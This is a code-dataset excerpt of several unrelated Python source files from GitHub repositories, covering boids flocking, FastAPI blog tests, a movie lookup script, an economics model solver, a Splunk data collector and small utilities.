0.0\n \n def goal(self, x, y, z, flee=False):\n \n self.has_goal = True\n self.flee = flee\n self._gx = x\n self._gy = y\n self._gz = z\n \n def nogoal(self):\n \n self.has_goal = False\n \n def constrain(self):\n \n \"\"\"Cages the flock inside the x, y, w, h area.\n\n The actual cage is a bit larger,\n so boids don't seem to bounce of invisible walls\n (they are rather \"encouraged\" to stay in the area).\n\n If a boid touches the ground level,\n it may decide to perch there for a while.\n \"\"\"\n \n dx = self.w * 0.1\n dy = self.h * 0.1 \n \n for b in self:\n \n if b.x < self.x-dx: b.vx += _ctx.random(dx)\n if b.y < self.y-dy: b.vy += _ctx.random(dy)\n if b.x > self.x+self.w+dx: b.vx -= _ctx.random(dx)\n if b.y > self.y+self.h+dy: b.vy -= _ctx.random(dy)\n if b.z < 0: b.vz += 10\n if b.z > 100: b.vz -= 10\n \n if b.y > self._perch_y and _ctx.random() < self._perch:\n b.y = self._perch_y\n b.vy = -abs(b.vy) * 0.2\n b.is_perching = True\n try:\n b._perch_t = self._perch_t()\n except:\n b._perch_t = self._perch_t\n \n def update(\n self, \n shuffled=True, \n cohesion=100, \n separation=10, \n alignment=5, \n goal=20,\n limit=30,\n ):\n \n \"\"\"Calculates the next motion frame for the flock.\"\"\"\n \n # Shuffling the list of boids ensures fluid movement.\n # If you need the boids to retain their position in the list\n # each update, set the shuffled parameter to False.\n from random import shuffle\n if shuffled: shuffle(self)\n \n m1 = 1.0 # cohesion\n m2 = 1.0 # separation\n m3 = 1.0 # alignment\n m4 = 1.0 # goal\n \n # The flock scatters randomly with a Boids.scatter chance.\n # This means their cohesion (m1) is reversed,\n # and their joint alignment (m3) is dimished,\n # causing boids to oscillate in confusion.\n # Setting Boids.scatter(chance=0) ensures they never scatter.\n if not self.scattered and _ctx.random() < self._scatter:\n self.scattered = True\n if self.scattered:\n m1 = -m1\n m3 *= 0.25\n self._scatter_i += 1\n if self._scatter_i >= self._scatter_t:\n self.scattered = False\n self._scatter_i = 0\n\n # A flock can have a goal defined with Boids.goal(x,y,z),\n # a place of interest to flock around.\n if not self.has_goal:\n m4 = 0\n if self.flee:\n m4 = -m4\n \n for b in self:\n \n # A boid that is perching will continue to do so\n # until Boid._perch_t reaches zero.\n if b.is_perching:\n if b._perch_t > 0:\n b._perch_t -= 1\n continue\n else:\n b.is_perching = False\n \n vx1, vy1, vz1 = b.cohesion(cohesion)\n vx2, vy2, vz2 = b.separation(separation)\n vx3, vy3, vz3 = b.alignment(alignment)\n vx4, vy4, vz4 = b.goal(self._gx, self._gy, self._gz, goal)\n \n b.vx += m1*vx1 + m2*vx2 + m3*vx3 + m4*vx4\n b.vy += m1*vy1 + m2*vy2 + m3*vy3 + m4*vy4\n b.vz += m1*vz1 + m2*vz2 + m3*vz3 + m4*vz4\n \n b.limit(limit)\n \n b.x += b.vx\n b.y += b.vy\n b.z += b.vz\n \n self.constrain()\n \ndef flock(n, x, y, w, h):\n return Boids(n, x, y, w, h)\n","repo_name":"shoebot/shoebot","sub_path":"lib/boids/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"78"} +{"seq_id":"22447748010","text":"from fastapi import FastAPI\nfrom fastapi.testclient import TestClient\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\nfrom routes import router as blog_router\n\napp = FastAPI()\nconfig = dotenv_values(\".env\")\napp.include_router(blog_router, tags=[\"blog\"], prefix=\"/blog\")\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n app.mongodb_client = MongoClient(config[\"ATLAS_URI\"])\n app.database = app.mongodb_client[config[\"DB_NAME\"] + \"test\"]\n\n# @app.on_event(\"shutdown\")\n# async def shutdown_event():\n# app.mongodb_client.close()\n# app.database.drop_collection(\"blogs\")\n\ndef test_create_blog():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 201\n\n body = response.json()\n assert body.get(\"title\") == \"Title test\"\n assert body.get(\"content\") == \"Content test\"\n assert body.get(\"author\") == \"Kahouli test\"\n assert \"_id\" in body\n\n\ndef test_create_blog_missing_title():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"content\": \"Content test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 422\n\n\ndef test_create_blog_missing_author():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\"})\n assert response.status_code == 422\n\ndef test_create_blog_missing_content():\n with TestClient(app) as client:\n response = client.post(\"/blog/\", json={\"title\": \"Title test\", \"author\": \"Kahouli test\"})\n assert response.status_code == 422\n\n\n\ndef test_get_blog():\n with TestClient(app) as client:\n new_blog = client.post(\"/blog/\", json={\"title\": \"Title test\", \"content\": \"Content test\", \"author\": \"Kahouli test\"}).json()\n\n get_blog_response = client.get(\"/blog/\" + new_blog.get(\"_id\"))\n assert get_blog_response.status_code == 200\n assert get_blog_response.json() == new_blog\n\n\ndef test_get_blog_unexisting():\n with TestClient(app) as client:\n get_blog_response = client.get(\"/blog/unexisting_id\")\n assert get_blog_response.status_code == 404\n\n\n# def test_update_book():\n# with TestClient(app) as client:\n# new_book = client.post(\"/book/\", json={\"title\": \"Don Quixote\", \"author\": \"Miguel de Cervantes\", \"synopsis\": \"...\"}).json()\n\n# response = client.put(\"/book/\" + new_book.get(\"_id\"), json={\"title\": \"Don Quixote 1\"})\n# assert response.status_code == 200\n# assert response.json().get(\"title\") == \"Don Quixote 1\"\n\n\n# def test_update_book_unexisting():\n# with TestClient(app) as client:\n# update_book_response = client.put(\"/book/unexisting_id\", json={\"title\": \"Don Quixote 1\"})\n# assert update_book_response.status_code == 404\n\n\n# def test_delete_book():\n# with TestClient(app) as client:\n# new_book = client.post(\"/book/\", json={\"title\": \"Don Quixote\", \"author\": \"Miguel de Cervantes\", \"synopsis\": \"...\"}).json()\n\n# delete_book_response = client.delete(\"/book/\" + new_book.get(\"_id\"))\n# assert delete_book_response.status_code == 204\n\n\n# def test_delete_book_unexisting():\n # with TestClient(app) as client:\n # delete_book_response = client.delete(\"/book/unexisting_id\")\n # assert delete_book_response.status_code == 404\n\n","repo_name":"kahouliiAlaa/BlogApplication","sub_path":"server/test_blogs_apis.py","file_name":"test_blogs_apis.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2057946203","text":"# app/seach_service.py\n\nimport os\nimport json\n\nfrom dotenv import load_dotenv\nimport requests\nimport re\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nimport webbrowser\n\nload_dotenv()\n\nOMDB_API_KEY = os.environ.get(\"OMDB_API_KEY\")\n\nYOUTUBE_API_KEY = os.environ.get(\"YOUTUBE_API_KEY\")\nYOUTUBE_API_SERVICE_NAME='youtube'\nYOUTUBE_API_VERSION='v3'\n\ndef get_response(title):\n \"\"\"\n Issues a request and parses response\n Param: (movie or tv show) title (str) like \"Iron Man\" or \"Game of Thrones\"\n Example: get_response(\"Iron Man\")\n Returns: parsed_response # dictionary representing the original JSON response\n \"\"\"\n # how to replace whitespaces (source): https://stackoverflow.com/questions/1007481/how-do-i-replace-whitespaces-with-underscore-and-vice-versa\n title.replace(\" \",\"+\") # transforms the user input so that it is suitable for the request url later\n\n request_url = f\"https://omdbapi.com/?s={title}&apikey={OMDB_API_KEY}\"\n response = requests.get(request_url)\n\n # validating user's input\n if \"\\\"Response\\\":\\\"False\\\"\" in response.text:\n print(\"Oops, couldn't find that movie. Please try again.\")\n exit()\n\n parsed_response = json.loads(response.text)\n return parsed_response\n\ndef get_response_2(id):\n \"\"\"\n Issues a request and parses response\n Param: (valid IMDb) id (str) like \"tt0371746\"\n Example: get_response(\"tt0371746\")\n Returns: parsed_response # dictionary representing the original JSON response\n \"\"\"\n\n request_url = f\"https://omdbapi.com/?i={id}&apikey={OMDB_API_KEY}\"\n response = requests.get(request_url)\n\n # validating id\n if \"\\\"Response\\\":\\\"False\\\"\" in response.text:\n print(\"Oops, couldn't find that movie. Please try again.\")\n exit()\n\n parsed_response = json.loads(response.text)\n return parsed_response\n\n# title lookup results from search\ndef print_sr(search_results, readable_list):\n \"\"\"\n Prints results of movie lookup (movie/tv show title and release year)\n Param: search_results (list) like sr and readable_list (str) like org_list\n Example: print_sr(sr, org_list)\n Returns: None\n \"\"\"\n\n for title in search_results:\n readable_list.append(title[\"Title\"] + \", \" + title[\"Year\"].replace(\"–\",\"-\"))\n print(title[\"Title\"] + \" (\" + title[\"Year\"] +\")\") # prints a list of the search results' title and release year\n\n return None\n\n# Titlecase string\ndef title_except(s, exceptions):\n \"\"\"\n Transforms string so that it will capitalize the first letter in each word, with some exceptions\n Source: https://stackoverflow.com/questions/3728655/titlecasing-a-string-with-exceptions/3729060\n Param: s (str) like \"Hi, my name is john smith\" and exceptions (list of str) like [\"a\", \"an\", \"is\"]\n Example: title_except(\"Hi, my name is john smith\", [\"a\", \"an\", \"is\"])\n Returns: \"Hi, My Name is John Smith\"\n \"\"\"\n word_list = re.split(' ', s) # re.split behaves as expected\n final = [word_list[0].capitalize()]\n for word in word_list[1:]:\n final.append(word if word in exceptions else word.capitalize())\n return \" \".join(final)\n\n# finds YouTube trailer\ndef youtube_search(options):\n \"\"\"\n Searches for YouTube video \n \n Source: https://github.com/youtube/api-samples/blob/master/python/search.py\n Param: options (str) like \"Iron Man\"\n Example: youtube_search(\"Iron Man\")\n Returns: url link to trailer\n \"\"\"\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,\n developerKey=YOUTUBE_API_KEY)\n\n # Call the search.list method to retrieve results matching the specified query term.\n search_response = youtube.search().list(\n q=options + \" trailer\",\n part='id,snippet',\n maxResults=1\n ).execute()\n\n # Add each result to the appropriate list, and then display the lists of matching videos, channels, and playlists.\n for search_result in search_response.get('items', []):\n if search_result['id']['kind'] == 'youtube#video': \n #print ('YouTube Trailer:\\n', search_result['snippet']['title'])\n #print(' ' + 'https://www.youtube.com/watch?v=' + search_result['id']['videoId'])\n trailer_url = f\"https://www.youtube.com/watch?v=\" + search_result['id']['videoId']\n print(\"----------------------------------\")\n return trailer_url\n else:\n print('Sorry, a trailer could not be found for this movie.')\n print(\"----------------------------------\")\n\nif __name__ == \"__main__\":\n\n #\n # INFO INPUTS\n #\n\n title = input(\"Please enter a movie or tv show title (i.e. 'Iron Man' or 'Game of Thrones'): \") # accept user input\n\n parsed_response = get_response(title)\n\n sr = parsed_response[\"Search\"] # search results\n\n\n # if there is more than one result, then the program will have the user choose the title they were looking for\n # from a list; otherwise, the program will go ahead and display the information of the one found result\n if int(parsed_response[\"totalResults\"]) > 1:\n \n org_list = []\n\n print_sr(sr, org_list)\n print(\"----------------------------------\")\n\n while True:\n correct_search = input(\"From the list above, what title were you looking for? Please write in the format of Title, Year (i.e. The Avengers, 1998): \")\n \n articles = ['a', 'an', 'of', 'the', 'is', 'with', 'in']\n correct_search = title_except(correct_search, articles)\n\n correct_title = correct_search.split(\", \")\n correct_name = correct_title[0]\n\n if (correct_search) in org_list:\n i = org_list.index(correct_search) # finds the index of the title the user is looking for in org_list so it can be matched with the one in the parsed_response\n id = sr[i][\"imdbID\"] \n break\n else:\n print(\"Sorry, there was no match to the list above. Please try again and make sure you're writing in the correct format.\")\n else:\n id = sr[0][\"imdbID\"]\n correct_name = title\n correct_search = title\n\n\n # make another request to match ids\n parsed_response = get_response_2(id)\n\n title_name = parsed_response[\"Title\"]\n release_year = parsed_response[\"Year\"]\n genre = parsed_response[\"Genre\"]\n director = parsed_response[\"Director\"]\n cast = parsed_response[\"Actors\"]\n summary = parsed_response[\"Plot\"]\n rating = parsed_response[\"Ratings\"][0][\"Value\"]\n\n #\n # INFO OUTPUTS\n #\n\n print(\"----------------------------------\")\n print(f\"TITLE: {title_name} ({release_year})\")\n print(\"----------------------------------\")\n\n print(f\"GENRE: {genre}\")\n print(f\"DIRECTOR: {director}\")\n print(f\"MAIN CAST: {cast}\")\n print(f\"SUMMARY: {summary}\")\n print(f\"IMDb RATING: {rating}\")\n print(\"----------------------------------\")\n\n\n # YouTube search \n while True:\n youtube = input(f\"Would you like to see a trailer for {title_name}? [Y/N] \")\n if youtube.lower() == \"y\":\n print(\"Okay, pulling up trailer now...\")\n url = youtube_search(correct_search)\n webbrowser.open(url)\n break\n elif youtube.lower() == \"n\":\n print(\"Okay, you opted not to watch the trailer.\")\n print(\"----------------------------------\")\n break\n else:\n print(\"Sorry, that was not a valid choice, please try again and enter 'Y' or 'N'.\")","repo_name":"kristyyip/movie-lookup","sub_path":"app/search_service.py","file_name":"search_service.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15270101709","text":"import numpy as np\nfrom scipy.special import roots_hermite\n\nfrom soepy.shared.non_employment import calculate_non_employment_consumption_resources\nfrom soepy.shared.shared_auxiliary import calculate_log_wage\nfrom soepy.shared.shared_auxiliary import calculate_non_consumption_utility\nfrom soepy.shared.shared_auxiliary import draw_disturbances\nfrom soepy.shared.shared_constants import HOURS\nfrom soepy.solve.emaxs import construct_emax\nfrom soepy.solve.validation_solve import construct_emax_validation\n\n\ndef pyth_solve(\n states,\n covariates,\n child_state_indexes,\n model_params,\n model_spec,\n prob_child,\n prob_partner,\n is_expected,\n):\n \"\"\"Solve the model by backward induction.\n\n The solution routine performs four key operations:\n - create all nodes (state space points) of the decision tree (state space)\n that the agents might possibly reach.\n - create covariates that depend on the state space components at every\n state space point.\n - calculate the instantaneous/flow utilities for each possible choice at every\n state space point\n - calculate the continuation values for each choice at every\n state space point.\n\n Parameters\n __________\n model_params : namedtuple\n Namedtuple containing all structural, potentially free and estimable,\n parameters relevant for running a simulation.\n model_spec : namedtuple\n Namedtuple containing all fixed parameters relevant for running a simulation\n is_expected: bool\n A boolean indicator that differentiates between the human capital accumulation\n process that agents expect (is_expected = True) and that the market generates\n (is_expected = False)\n\n Returns\n _______\n states : np.ndarray\n Array with shape (num_states, 5) containing period, years of schooling,\n the lagged choice, the years of experience in part-time, and the\n years of experience in full-time employment.\n indexer : np.ndarray\n A matrix where each dimension represents a characteristic of the state space.\n Switching from one state is possible via incrementing appropriate indices by 1.\n covariates : np.ndarray\n Array with shape (num_states, number of covariates) containing all additional\n covariates, which depend only on the state space information.\n emaxs : np.ndarray\n Array with shape (num states, num_choices +1). First block of dimension\n num_choices contains continuation values of the state space point.\n Lat element contains the expected maximum value function of the state space point.\n \"\"\"\n\n draws_emax, draw_weights_emax = get_integration_draws_and_weights(\n model_spec, model_params\n )\n\n non_consumption_utilities = calculate_non_consumption_utility(\n model_params.theta_p,\n model_params.theta_f,\n model_params.no_kids_f,\n model_params.no_kids_p,\n model_params.yes_kids_f,\n model_params.yes_kids_p,\n model_params.child_0_2_f,\n model_params.child_0_2_p,\n model_params.child_3_5_f,\n model_params.child_3_5_p,\n model_params.child_6_10_f,\n model_params.child_6_10_p,\n states,\n covariates[:, 0],\n np.array([0, 1, 2], dtype=float),\n )\n\n log_wage_systematic = calculate_log_wage(\n model_params, states, is_expected\n ) + np.log(model_spec.elasticity_scale)\n\n tax_splitting = model_spec.tax_splitting\n\n non_employment_consumption_resources = (\n calculate_non_employment_consumption_resources(\n model_spec.ssc_deductions,\n model_spec.tax_params,\n model_spec,\n states,\n log_wage_systematic,\n covariates[:, 1],\n covariates[:, 3],\n tax_splitting,\n )\n )\n\n index_child_care_costs = np.where(covariates[:, 0] > 2, 0, covariates[:, 0]).astype(\n int\n )\n\n # Solve the model in a backward induction procedure\n # Error term for continuation values is integrated out\n # numerically in a Monte Carlo procedure\n emaxs = pyth_backward_induction(\n model_spec,\n tax_splitting,\n model_params.mu,\n model_params.delta,\n states,\n child_state_indexes,\n log_wage_systematic,\n non_consumption_utilities,\n draws_emax,\n draw_weights_emax,\n covariates,\n index_child_care_costs,\n prob_child,\n prob_partner,\n non_employment_consumption_resources,\n )\n\n # Return function output\n return (\n non_consumption_utilities,\n emaxs,\n )\n\n\ndef get_integration_draws_and_weights(model_spec, model_params):\n if model_spec.integration_method == \"quadrature\":\n # Draw standard points and corresponding weights\n standard_draws, draw_weights_emax = roots_hermite(model_spec.num_draws_emax)\n # Rescale draws and weights\n draws_emax = standard_draws * np.sqrt(2) * model_params.shock_sd\n draw_weights_emax *= 1 / np.sqrt(np.pi)\n elif model_spec.integration_method == \"monte_carlo\":\n draws_emax = draw_disturbances(\n model_spec.seed_emax, 1, model_spec.num_draws_emax, model_params\n )[0]\n draw_weights_emax = (\n np.ones(model_spec.num_draws_emax) / model_spec.num_draws_emax\n )\n else:\n raise ValueError(\n f\"Integration method {model_spec.integration_method} not specified.\"\n )\n\n return draws_emax, draw_weights_emax\n\n\n# @numba.njit\ndef pyth_backward_induction(\n model_spec,\n tax_splitting,\n mu,\n delta,\n states,\n child_state_indexes,\n log_wage_systematic,\n non_consumption_utilities,\n draws,\n draw_weights,\n covariates,\n index_child_care_costs,\n prob_child,\n prob_partner,\n non_employment_consumption_resources,\n):\n \"\"\"Get expected maximum value function at every state space point.\n Backward induction is performed all at once for all states in a given period.\n The function loops through each period. The included construct_emax function\n implicitly loops through all states in the period currently reached by the\n parent loop.\n\n Parameters\n ----------\n model_spec : namedtuple\n Contains all fixed parameters of the model including information on dimensions\n such as number of periods, agents, random draws, etc.\n states : np.ndarray\n Array with shape (num_states, 5) containing period, years of schooling,\n the lagged choice, the years of experience in part-time, and the\n years of experience in full-time employment.\n indexer : np.ndarray\n Array where each dimension represents a componenet of the state space.\n :data:`states[k]` returns the values of the state space components\n at state :data:`k`. Indexing :data:`indexer` by the same state space\n component values returns :data:`k`.\n log_wage_systematic : np.array\n One dimensional array with length num_states containing the part of the wages\n at the respective state space point that do not depend on the agent's choice,\n nor on the random shock.\n non_consumption_utilities : np.ndarray\n Array of dimension (num_states, num_choices) containing the utility\n contribution of non-pecuniary factors.\n\n Returns\n -------\n emaxs : np.ndarray\n An array of dimension (num_states, num choices + 1). The object's rows contain\n the continuation values of each choice at the specific state space points\n as its first elements. The last row element corresponds to the maximum\n expected value function of the state.\n \"\"\"\n dummy_array = np.zeros(4) # Need this array to define output for construct_emaxs\n\n emaxs = np.zeros((states.shape[0], non_consumption_utilities.shape[1] + 1))\n\n hours = np.array(HOURS)\n deductions_spec = model_spec.ssc_deductions\n tax_params = model_spec.tax_params\n child_care_costs = model_spec.child_care_costs\n\n erziehungsgeld_inc_single = model_spec.erziehungsgeld_income_threshold_single\n erziehungsgeld_inc_married = model_spec.erziehungsgeld_income_threshold_married\n erziehungsgeld = model_spec.erziehungsgeld\n\n num_periods = model_spec.num_periods\n\n # Loop backwards over all periods\n for period in np.arange(num_periods - 1, -1, -1, dtype=int):\n state_period_index = np.where(states[:, 0] == period)[0]\n\n # Extract period information\n # States\n states_period = states[state_period_index]\n\n # Probability that a child arrives\n prob_child_period = prob_child[period][states_period[:, 1]]\n\n # Probability of partner states.\n prob_partner_period = prob_partner[period][\n states_period[:, 1], states_period[:, 7]\n ]\n\n # Period rewards\n log_wage_systematic_period = log_wage_systematic[state_period_index]\n non_consumption_utilities_period = non_consumption_utilities[state_period_index]\n non_employment_consumption_resources_period = (\n non_employment_consumption_resources[state_period_index]\n )\n\n # Corresponding equivalence scale for period states\n covariates_state = covariates[state_period_index]\n male_wage_period = covariates_state[:, 1]\n equivalence_scale_period = covariates_state[:, 2]\n child_benefits_period = covariates_state[:, 3]\n\n index_child_care_costs_period = index_child_care_costs[state_period_index]\n\n # Continuation value calculation not performed for last period\n # since continuation values are known to be zero\n if period == num_periods - 1:\n emaxs_child_states = np.zeros(\n shape=(states_period.shape[0], 3, 2, 2), dtype=float\n )\n else:\n child_states_ind_period = child_state_indexes[state_period_index]\n emaxs_child_states = emaxs[:, 3][child_states_ind_period]\n\n if model_spec.parental_leave_regime == \"elterngeld\":\n # Calculate emax for current period reached by the loop\n emaxs_period = construct_emax(\n delta,\n log_wage_systematic_period,\n non_consumption_utilities_period,\n draws,\n draw_weights,\n emaxs_child_states,\n prob_child_period,\n prob_partner_period,\n hours,\n mu,\n non_employment_consumption_resources_period,\n deductions_spec,\n tax_params,\n child_care_costs,\n index_child_care_costs_period,\n male_wage_period,\n child_benefits_period,\n equivalence_scale_period,\n tax_splitting,\n dummy_array,\n )\n elif model_spec.parental_leave_regime == \"erziehungsgeld\":\n\n baby_child_period = (states_period[:, 6] == 0) | (states_period[:, 6] == 1)\n # Calculate emax for current period reached by the loop\n emaxs_period = construct_emax_validation(\n delta,\n baby_child_period,\n log_wage_systematic_period,\n non_consumption_utilities_period,\n draws,\n draw_weights,\n emaxs_child_states,\n prob_child_period,\n prob_partner_period,\n hours,\n mu,\n non_employment_consumption_resources_period,\n deductions_spec,\n tax_params,\n child_care_costs,\n index_child_care_costs_period,\n male_wage_period,\n child_benefits_period,\n equivalence_scale_period,\n erziehungsgeld_inc_single,\n erziehungsgeld_inc_married,\n erziehungsgeld,\n tax_splitting,\n dummy_array,\n )\n\n else:\n raise ValueError(\n f\"Parental leave regime {model_spec.parental_leave_regime} not specified.\"\n )\n\n emaxs[state_period_index] = emaxs_period\n\n return emaxs\n","repo_name":"OpenSourceEconomics/soepy","sub_path":"soepy/solve/solve_python.py","file_name":"solve_python.py","file_ext":"py","file_size_in_byte":12216,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"23969462181","text":"from __future__ import absolute_import\nfrom builtins import object\nimport time\nimport threading\nfrom . import ta_consts as c\nimport splunktaucclib.common.log as stulog\nimport splunktalib.common.util as scu\nfrom collections import namedtuple\n\nevt_fmt = (\n \"{0}\"\n \"\"\n \"\"\n \"\"\n \"{4}\"\n \"\"\n)\n\nunbroken_evt_fmt = (\n \"\"\n ''\n \"{0}\"\n \"\"\n \"\"\n \"\"\n \"{4}\"\n \"\"\n \"{6}\"\n \"\"\n \"\"\n)\n\nevent_tuple = namedtuple(\n \"Event\",\n [\n \"host\",\n \"source\",\n \"sourcetype\",\n \"time\",\n \"index\",\n \"raw_data\",\n \"is_unbroken\",\n \"is_done\",\n ],\n)\n\n\nclass TADataCollector(object):\n def __init__(\n self,\n tconfig,\n meta_config,\n task_config,\n checkpoint_manager_cls,\n data_client_cls,\n data_loader,\n ):\n self._lock = threading.Lock()\n self._ta_config = tconfig\n self._meta_config = meta_config\n self._task_config = task_config\n self._stopped = True\n self._p = self._get_logger_prefix()\n self._checkpoint_manager = checkpoint_manager_cls(meta_config, task_config)\n self.data_client_cls = data_client_cls\n self._data_loader = data_loader\n self._client = None\n\n def get_meta_configs(self):\n return self._meta_config\n\n def get_task_config(self):\n return self._task_config\n\n def get_interval(self):\n return self._task_config[c.interval]\n\n def _get_logger_prefix(self):\n pairs = ['{}=\"{}\"'.format(c.stanza_name, self._task_config[c.stanza_name])]\n for key in self._task_config[c.divide_key]:\n pairs.append('{}=\"{}\"'.format(key, self._task_config[key]))\n return \"[{}]\".format(\" \".join(pairs))\n\n def stop(self):\n self._stopped = True\n if self._client:\n self._client.stop()\n\n def __call__(self):\n self.index_data()\n\n def _build_event(self, events):\n if not events:\n return None\n if not isinstance(events, list):\n events = [events]\n evts = []\n for event in events:\n assert event.raw_data, \"the raw data of events is empty\"\n if event.is_unbroken:\n evt = unbroken_evt_fmt.format(\n event.host or \"\",\n event.source or \"\",\n event.sourcetype or \"\",\n event.time or \"\",\n event.index or \"\",\n scu.escape_cdata(event.raw_data),\n \"\" if event.is_done else \"\",\n )\n else:\n evt = evt_fmt.format(\n event.host or \"\",\n event.source or \"\",\n event.sourcetype or \"\",\n event.time or \"\",\n event.index or \"\",\n scu.escape_cdata(event.raw_data),\n )\n evts.append(evt)\n return evts\n\n def _get_ckpt(self):\n return self._checkpoint_manager.get_ckpt()\n\n def _get_ckpt_key(self):\n return self._checkpoint_manager.get_ckpt_key()\n\n def _update_ckpt(self, ckpt):\n return self._checkpoint_manager.update_ckpt(ckpt)\n\n def _create_data_client(self):\n ckpt = self._get_ckpt()\n data_client = self.data_client_cls(\n self._ta_config.get_all_conf_contents(),\n self._meta_config,\n self._task_config,\n ckpt,\n self._checkpoint_manager,\n )\n\n stulog.logger.debug(\"{} Set {}={} \".format(self._p, c.ckpt_dict, ckpt))\n return data_client\n\n def index_data(self):\n if self._lock.locked():\n stulog.logger.debug(\n \"Last round of stanza={} is not done yet\".format(\n self._task_config[c.stanza_name]\n )\n )\n return\n with self._lock:\n self._stopped = False\n checkpoint_key = self._get_ckpt_key()\n stulog.logger.info(\n \"{} Start indexing data for checkpoint_key={\"\n \"}\".format(self._p, checkpoint_key)\n )\n try:\n\n self._do_safe_index()\n except Exception:\n stulog.logger.exception(\"{} Failed to index data\".format(self._p))\n stulog.logger.info(\n \"{} End of indexing data for checkpoint_key={}\".format(\n self._p, checkpoint_key\n )\n )\n\n def _write_events(self, ckpt, events):\n evts = self._build_event(events)\n if evts:\n if not self._data_loader.write_events(evts):\n stulog.logger.info(\n \"{} the event queue is closed and the \"\n \"received data will be discarded\".format(self._p)\n )\n return False\n if ckpt is None:\n return True\n for i in range(3):\n try:\n self._update_ckpt(ckpt)\n except Exception:\n stulog.logger.exception(\n \"{} Failed to update ckpt {} to {}\".format(\n self._p, self._get_ckpt_key(), ckpt\n )\n )\n time.sleep(2)\n continue\n else:\n return True\n # write checkpoint fail\n self.stop()\n return False\n\n def _do_safe_index(self):\n self._client = self._create_data_client()\n while not self._stopped:\n try:\n events, ckpt = self._client.get()\n if not events and not ckpt:\n continue\n else:\n if not self._write_events(ckpt, events):\n break\n except StopIteration:\n stulog.logger.debug(\"{} Finished this round\".format(self._p))\n break\n except Exception:\n stulog.logger.exception(\"{} Failed to get msg\".format(self._p))\n break\n self.stop()\n try:\n self._client.get()\n except StopIteration:\n stulog.logger.debug(\"{} Invoke client.get() after stop \".format(self._p))\n","repo_name":"LetMeR00t/TA-thehive-cortex","sub_path":"TA-thehive-cortex/bin/ta_thehive_cortex/aob_py3/splunktaucclib/data_collection/ta_data_collector.py","file_name":"ta_data_collector.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"24194061112","text":"from IO import *\n\ndef _DIF():\n return 'DailyDIF'\n\ndef _DIF_AVG(length):\n return 'DailyDIF_AVG'+str(length)\n\n\ndef calc_dif(data) :\n print('calc dif, tag is [' + _DIF() + ']')\n\n for i in range(1, len(data)):\n data[i][_DIF()] = data[i][PRICE] / data[i-1][PRICE]\n\n\ndef calc_average(data, length) :\n print('calc dif_average, tag is [' + _DIF_AVG(length) + ']')\n\n if(length *2 > len(data)):\n print('length(' + str(length) + ') is too long')\n return\n\n sum = 0\n for i in range(1, length*2+1):\n sum += data[i][_DIF()]\n\n for i in range(length+1, len(data)-length):\n data[i][_DIF_AVG(length)] = sum / length / 2\n\n sum -= data[i-length][_DIF()]\n sum += data[i+length][_DIF()]\n\ndef plot_average(data, length, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF_AVG(length) in row):\n date.append(row[DATE])\n price.append(row[_DIF_AVG(length)])\n \n ax.plot(date, price, label=title)\n\ndef hist_dif(data, expected, variance, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF() in row):\n date.append(row[DATE])\n price.append(row[_DIF()])\n \n ax.hist(price, label=title, bins=200, density=True)\n\n x_axis = np.arange(.9,1.1, 0.001)\n ax.plot(x_axis, norm.pdf(x_axis,expected, variance ** 0.5))\n\ndef plot_dif(data, title):\n date = []\n price = []\n\n for row in data:\n if(_DIF() in row):\n date.append(row[DATE])\n price.append(row[_DIF()])\n \n ax.plot(date, price, '.' , label=title)\n","repo_name":"pozdnyako/MOEX","sub_path":"difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4846583051","text":"import constants\nfrom app import app\nfrom flask import render_template, request\n\n\n@app.route('/', methods=['GET'])\ndef index():\n name = request.values.get('username')\n if not name:\n name = ''\n gender = request.values.get('gender')\n program_id = request.values.get('program')\n subject_id = request.values.getlist('subject[]')\n # формируем список из выбранных пользовате��ем дисциплин\n subjects_select = [constants.subjects[int(i)] for i in subject_id]\n # формируем список из выбранных пользователем олимпиад\n olympiad_id = request.values.getlist('olympiad[]')\n olympiads_select = [constants.olympiads[int(i)] for i in olympiad_id]\n if program_id:\n program = constants.programs[int(program_id)]\n else:\n program = constants.programs[0]\n\n html = render_template(\n 'index.html',\n program_list=constants.programs,\n subject_list=constants.subjects,\n olympiad_list=constants.olympiads,\n len=len,\n name=name,\n gender=gender,\n program=program,\n subjects_select=subjects_select,\n olympiads_select=olympiads_select\n )\n\n if program_id:\n html += render_template(\n 'hello.html',\n program_list=constants.programs,\n subject_list=constants.subjects,\n olympiad_list=constants.olympiads,\n len=len,\n name=name,\n gender=gender,\n program=program,\n subjects_select=subjects_select,\n olympiads_select=olympiads_select\n )\n return html\n","repo_name":"dendudko/NetworkTech7","sub_path":"Lab6__Flask/controllers/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22736718571","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 15 21:54:31 2022\r\n\r\n@author: Hp\r\n\"\"\"\r\n\r\nfrom random import *\r\n\r\nItems=[\"cake\", \"coffee\", \"iced coffee\"]\r\nprices=[0.550, 0.300, 